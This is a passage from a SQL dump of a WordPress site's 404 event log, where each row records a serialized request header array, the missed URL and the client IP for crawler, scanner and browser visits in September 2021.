Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631270264.643024921417236328125;s:12:\"REQUEST_TIME\";i:1631270264;}}','notice','2021-09-10 10:37:46','2021-09-10 10:37:44',72649312,72748712,'https://zphiblgz.org/scholarship/application/recommendation/',1,0,'147.78.141.191'),(96940,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:16:{s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:1:\"*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:12:\"HTTP_REFERER\";s:20:\"https://zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631270261.5683619976043701171875;s:12:\"REQUEST_TIME\";i:1631270261;}}','notice','2021-09-10 10:37:43','2021-09-10 10:37:41',72649312,72748712,'https://zphiblgz.org/scholarship/application/recommendation/',1,0,'147.78.141.191'),(96939,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:16:{s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:1:\"*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:12:\"HTTP_REFERER\";s:20:\"https://zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631270258.465796947479248046875;s:12:\"REQUEST_TIME\";i:1631270258;}}','notice','2021-09-10 10:37:40','2021-09-10 10:37:38',72666272,72765568,'https://zphiblgz.org/scholarship/application/recommendation/',1,0,'147.78.141.191'),(97321,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:16:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:9:\"HTTP_FROM\";s:24:\"bingbot(at)microsoft.com\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:71:\"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1632278835.063520908355712890625;s:12:\"REQUEST_TIME\";i:1632278835;}}','notice','2021-09-22 02:47:17','2021-09-22 02:47:15',72169016,72256280,'https://zphiblgz.org/event/youth-open-house/',1,0,'207.46.13.170'),(97322,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:10:{s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:25:\"AdsBot-Google-Mobile-Apps\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1632288037.306148052215576171875;s:12:\"REQUEST_TIME\";i:1632288037;}}','notice','2021-09-22 05:20:39','2021-09-22 05:20:37',72336912,72420552,'http://zphiblgz.org/bda64137-7062-4220-bc01-1e98caa72571',1,0,'3.94.137.21'),(97323,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:10:{s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:107:\"Mozilla/7.0 (Linux; Android 6.0; Mac OS X; no-NO; rv:8.0) Chrome/86.2.1 AppleWebKit/92.9.3 SeaMonkey/17.9.9\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1632288040.3038690090179443359375;s:12:\"REQUEST_TIME\";i:1632288040;}}','notice','2021-09-22 05:20:43','2021-09-22 05:20:40',72337016,72420656,'http://zphiblgz.org/bda64137-7062-4220-bc01-1e98caa72571',1,0,'3.94.137.21'),(97324,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:11:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:18:\"Go-http-client/1.1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1632288044.296680927276611328125;s:12:\"REQUEST_TIME\";i:1632288044;}}','notice','2021-09-22 05:20:46','2021-09-22 05:20:44',72630360,72714000,'http://zphiblgz.org/bda64137-7062-4220-bc01-1e98caa72571',1,0,'3.94.137.21'),(97325,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:11:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:18:\"Go-http-client/1.1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1632288047.3071000576019287109375;s:12:\"REQUEST_TIME\";i:1632288047;}}','notice','2021-09-22 05:20:49','2021-09-22 05:20:47',72630360,72714000,'http://zphiblgz.org/bda64137-7062-4220-bc01-1e98caa72571',1,0,'3.94.137.21'),(97326,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:16:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:9:\"HTTP_FROM\";s:24:\"bingbot(at)microsoft.com\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:71:\"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1632288326.631248950958251953125;s:12:\"REQUEST_TIME\";i:1632288326;}}','notice','2021-09-22 05:25:28','2021-09-22 05:25:26',72145048,72228240,'https://zphiblgz.org/event/ladiez-real-talk-empowerment-summit/',1,0,'157.55.39.64'),(97327,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:16:{s:11:\"HTTP_ACCEPT\";s:47:\"text/html,application/xhtml+xml,application/xml\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:68:\"Buck/2.2; (+https://app.hypefactors.com/media-monitoring/about.html)\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1632293609.1164379119873046875;s:12:\"REQUEST_TIME\";i:1632293609;}}','notice','2021-09-22 06:53:30','2021-09-22 06:53:29',72630232,72714000,'http://zphiblgz.org/application',1,0,'3.90.15.189'),(97328,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:15:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:7:\"deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:35:\"ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1632309701.3402080535888671875;s:12:\"REQUEST_TIME\";i:1632309701;}}','notice','2021-09-22 11:21:43','2021-09-22 11:21:41',72605696,72689432,'http://zphiblgz.org/scholarship/application/',1,0,'80.253.235.47'),(97329,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:16:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:9:\"HTTP_FROM\";s:24:\"bingbot(at)microsoft.com\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:71:\"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1632317151.3090789318084716796875;s:12:\"REQUEST_TIME\";i:1632317151;}}','notice','2021-09-22 13:25:53','2021-09-22 13:25:51',73788968,73890400,'https://zphiblgz.org/scholarship/application/recommendation/',1,0,'207.46.13.113'),(97330,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:14:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:45:\"https://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:102:\"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1632322941.651443004608154296875;s:12:\"REQUEST_TIME\";i:1632322941;}}','notice','2021-09-22 15:02:23','2021-09-22 15:02:21',74252552,74337672,'https://zphiblgz.org/scholarship/application/',1,0,'104.244.79.6'),(97331,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:16:{s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:1:\"*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:12:\"HTTP_REFERER\";s:20:\"https://zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1632323992.07468509674072265625;s:12:\"REQUEST_TIME\";i:1632323992;}}','notice','2021-09-22 15:19:54','2021-09-22 15:19:52',74289032,74390464,'https://zphiblgz.org/scholarship/application/recommendation/',1,0,'172.98.86.184'),(97332,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:16:{s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:1:\"*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:12:\"HTTP_REFERER\";s:20:\"https://zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1632323995.8762719631195068359375;s:12:\"REQUEST_TIME\";i:1632323995;}}','notice','2021-09-22 15:19:57','2021-09-22 15:19:56',74290208,74391744,'https://zphiblgz.org/scholarship/application/recommendation/',1,0,'172.98.86.184'),(97333,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:16:{s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:1:\"*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:12:\"HTTP_REFERER\";s:20:\"https://zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1632323999.6320860385894775390625;s:12:\"REQUEST_TIME\";i:1632323999;}}','notice','2021-09-22 15:20:00','2021-09-22 15:19:59',74066872,74168408,'https://zphiblgz.org/scholarship/application/recommendation/',1,0,'172.98.86.184'),(97334,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:16:{s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:1:\"*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:12:\"HTTP_REFERER\";s:20:\"https://zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1632324002.29100799560546875;s:12:\"REQUEST_TIME\";i:1632324002;}}','notice','2021-09-22 15:20:04','2021-09-22 15:20:02',74290208,74391744,'https://zphiblgz.org/scholarship/application/recommendation/',1,0,'172.98.86.184'),(97335,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:13:{s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/signed-exchange;v=b3,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_FROM\";s:26:\"googlebot(at)googlebot.com\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:72:\"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1632330708.0942680835723876953125;s:12:\"REQUEST_TIME\";i:1632330708;}}','notice','2021-09-22 17:11:50','2021-09-22 17:11:48',73822744,73924224,'http://zphiblgz.org/n_top/img/plan.pdf',1,0,'66.249.65.165'),(97336,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:17:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:24:\"my.support.wordpress.com\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1632333580.892343997955322265625;s:12:\"REQUEST_TIME\";i:1632333580;}}','notice','2021-09-22 17:59:42','2021-09-22 17:59:41',74412472,74506256,'https://zphiblgz.org/wp-includes/pomo/so.php?x=1',1,0,'185.191.34.215'),(97337,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:14:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:9:\"TE, close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:7:\"HTTP_TE\";s:18:\"deflate,gzip;q=0.3\";s:15:\"HTTP_USER_AGENT\";s:35:\"SiteLockSpider [en] (WinNT; I ;Nav)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1632337745.22932910919189453125;s:12:\"REQUEST_TIME\";i:1632337745;}}','notice','2021-09-22 19:09:07','2021-09-22 19:09:05',74252520,74337592,'https://zphiblgz.org/th1s_1s_a_4o4.html',1,0,'184.154.139.18'),(97338,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:19:{s:14:\"CONTENT_LENGTH\";s:2:\"50\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:78:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1632342767.8241670131683349609375;s:12:\"REQUEST_TIME\";i:1632342767;}}','notice','2021-09-22 20:32:50','2021-09-22 20:32:48',74407160,74442440,'https://zphiblgz.org/assets/images/accesson.php',1,0,'185.191.34.215'),(97103,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:13:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip,identity\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:169:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.1 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631742398.6322309970855712890625;s:12:\"REQUEST_TIME\";i:1631742398;}}','notice','2021-09-15 21:46:41','2021-09-15 21:46:38',72181280,72268544,'https://zphiblgz.org/event/youth-open-house/',1,0,'17.121.115.110'),(97104,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:13:{s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/signed-exchange;v=b3,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_FROM\";s:26:\"googlebot(at)googlebot.com\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:72:\"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631742588.0996620655059814453125;s:12:\"REQUEST_TIME\";i:1631742588;}}','notice','2021-09-15 21:49:50','2021-09-15 21:49:48',72138440,72222576,'http://zphiblgz.org/tag/%E5%85%A5%E9%96%80%E3%81%AE%E5%84%80%E5%BC%8F/',1,0,'66.249.65.103'),(97102,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) 